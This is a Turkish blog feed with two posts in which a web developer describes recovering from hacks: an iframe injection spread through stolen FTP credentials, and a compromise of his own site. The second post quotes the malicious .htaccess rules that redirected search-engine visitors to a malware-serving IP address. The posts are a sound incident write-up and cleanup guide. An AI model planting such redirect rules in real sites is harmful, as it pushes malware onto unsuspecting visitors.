Fatih Hayrioğlu'nun not defteri » malware http://www.fatihhayrioglu.com { CSS, HTML ve Javascript } Mon, 09 Jan 2012 08:44:45 +0000 en hourly 1 http://wordpress.org/?v=2012 iframe virüsü ve Saldırgan Site damgalamasından kurtulmanın yolu http://www.fatihhayrioglu.com/iframe-virusu-ve-saldirgan-site-damgalamasindan-kurtulmanin-yolu/ http://www.fatihhayrioglu.com/iframe-virusu-ve-saldirgan-site-damgalamasindan-kurtulmanin-yolu/#comments Sat, 15 Aug 2009 20:51:00 +0000 fatih.hayrioglu http://www.fatihhayrioglu.com/?p=1314 Yaklaşık 2-3 haftadır bir çok yerde karşılaştığımız bu sorunun kaynağının ne olduğu konusunda bir çok makale okudum. Çözümler okudum uygulamalar yaptım sonuç olarak konuyu şöyle özetleyebiliriz.

Çeşitli yollardan bize musallat olan virüs(aslında pek virüs mantığı ile hareket etmiyor.) Sistemimizdeki ftp bilgilerini alıp bu bilgiler üzerinden sitelere otomatik olarak bir iframe kodu ekliyor. Genellikle index.xxx ve default.xxx isimli dosyalara otomatik olarak eklenen bir iframe kodu bu. Eklenen bu iframe kodu bazen boş bir sayfayı açarken bazende malware olarak adlandırılan kullanıcının bilgisayarına sızan bir virüs yükletmeye çalışıyor. Eklenen bu iframe genelde gizli olarak kodlandığı için(visibility:hidden) göremiyoruz.

iframe_kodu

Belli bir süre sonra Google siteyi tararken bu kodlamayı görüyor ve linki takip edincede siteden virüs yayılmaya çalışıyor diye sitenizi Saldırgan Site sınıflandırmasını sokuyor. 

google-warning

Saldırgan Site sınıfına giren sitemiz Google Chrome ve Firefox ile sitemize açmayan kişilere yukarıdakine benzer bir ekran ile karşılık verecektir ve kullanıcılar sitenize erişemeyecektir. 

Peki biz bu işten nasıl kurtulacağız. İlk olarak siteden bu kodları arayıp(genelde body etiketi sonrasına eklendiği için bulmak kolay.) bulup kaldıracağız. Ayrıca bilgisayarımızı sağlam bir virüs taramasından geçirip, tüm ftp şifrelerimizi değiştirmeyi unutmayalım. 

Bir sonraki adım olarak google’un saldırgan site listesinden çıkmak için Google Webmaster Tools‘una gireceğiz.

Siteye girdikten sonra sırası ile(İngilizce seçili olarak girdiğiniz farz ederek devam edeceğim. İşlerin hızlı yürümesi için İngilizceyi tercih etmenizi öneririm)

  • Add Site deyip sitemizi ekleyeceğiz. http://www.orneksite.com/
  • Continue basıp ilerleyince karşımıza Site verification sayfası çıkacak. Sitenin bize ait olup olmadığını kontrol için
  • Burada iki tür doğrulama isteniyor bizden Meta tag ve HTML file diye iki yolumuz var. Ben Meta tag’i seçip ilerliyorum. 
  • Site bize bir meta etiketi veriyor. Bu kodu alıp sitemize(<head>…</head> arasına) ekliyoruz. Sadece ana sayfaya eklemek yeterli. 

google-webmaster-tools

Sonra sitenin bize ait olduğunu anlayan goole bize sitemizin saldırgan site olarak listelendiğini söylüyor ve bundan kurtulmak için bir çare gösteriyor. 

badware

Request a review linkine tıklıyoruz. İşaret kutucuğunu işaretleyip metin girdi alanına bir cümlelik bir  durum beyan ediyoruz. 

Bu işlemlerden sonra google yaklaşık olarak 2-3 saat içinde sitemizi saldırgan site listesinden çıkarıyor.

Kaynaklar

  • http://sites.google.com/site/webmasterhelpforum/en/faq-malware-and-hacked-sites
  • http://www.cogzidel.com/blog/2009/07/malware-affects-your-google-listing-google-webmaster-tools-will-save-you/
]]> http://www.fatihhayrioglu.com/iframe-virusu-ve-saldirgan-site-damgalamasindan-kurtulmanin-yolu/feed/ 41 Hacklendik http://www.fatihhayrioglu.com/hacklendik/ http://www.fatihhayrioglu.com/hacklendik/#comments Tue, 18 Nov 2008 20:15:25 +0000 fatih.hayrioglu http://www.fatihhayrioglu.com/?p=770 Bu gün siteme girmeye çalışan Firefox ve Google üzerinden girmeye çalışanların karşılaştığı bir sorun sitem zararlı içerik olduğu için engellenmiş. Aslında tüm arama sitelerinden gelen yönlendirmeler de aynı sorun varmış. En sonunda anladım. Uzun aramalar sonunda http://wordpress.org/support/topic/217700 Bu linkdeki bilgiler doğrultusunda htcaacces içine girilen
yönlendirme kodu nedeni ile yaşamışım bu sorunları.

Ayrıca yazılarımın için yerleştirilmiş bir iframe reklam linkeleri de var tabi.

Yukarıdaki linkdeki işlemleri tek tek yaptım

- htaccess dosyasını sildim.
- ftp şifremi değiştirdim
- hostingh firmamdan sitemin bulnduğu klasörü bir virüs, malware taramasından geçirmelerini istedim.

Sorunun ana nedeni htaccess dosyasında ki kodlar olarak görünüyor. Başta uzunca bir boşluktan sonra aşağıdaki kod yazıyordu.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]

Bu arada cute ftp’de htaccess görüntülemeyide öğrendik.
http://blog.youontop.com/server-issues/view-htaccess-hidden-files-in-cuteftp-38.html

Muhtemelen sorun haftasonu benim kalıcı bağlantılarım gittinde oldu ve ben bunu anlamadım. Asıl sorunun ise sitemi yahoo.com’da aradığımda karşılaştım, linke tıkladığımda bilgisayarıma zararlı yazılım eklemeye çalıştı. Zaten yukarıdaki kodda da bu açıkça görülüyor, siteme direk girişlerde değilde arama sonuçlarından gelince yüklenmeye çalışıyor. Ama hesap edemedikleri şey google’un bunu görüp sitemi kapatması. Google’un ve Firefox’un sitemi engellemeleri daha bitmedi. Google Web Yöneticis aracındaki incelemeye alın işaret kutunu işaretledim ve StopBadware.org’daki formuda doldurdum. Neyse hayırlısı bakalım.

Bu durumu gören ve beni uyaran tüm arkadaşlara teşekkürler. Umarım bu tip sorunlarla bi daha karşılaşmayız.

Ek olarak

Ayrıca

http://www.fatihhayrioglu.com/?ref=siteAdi

gibi linkler var. Bunlarıda robots.txt

User-agent: *
Disallow: /*ref=*
Disallow: /*?ref=

kodlarını ekleyerek düzelttim. İşin ilginci bu linkleri google’un arama aracı nasıl buluyor.

]]> http://www.fatihhayrioglu.com/hacklendik/feed/ 43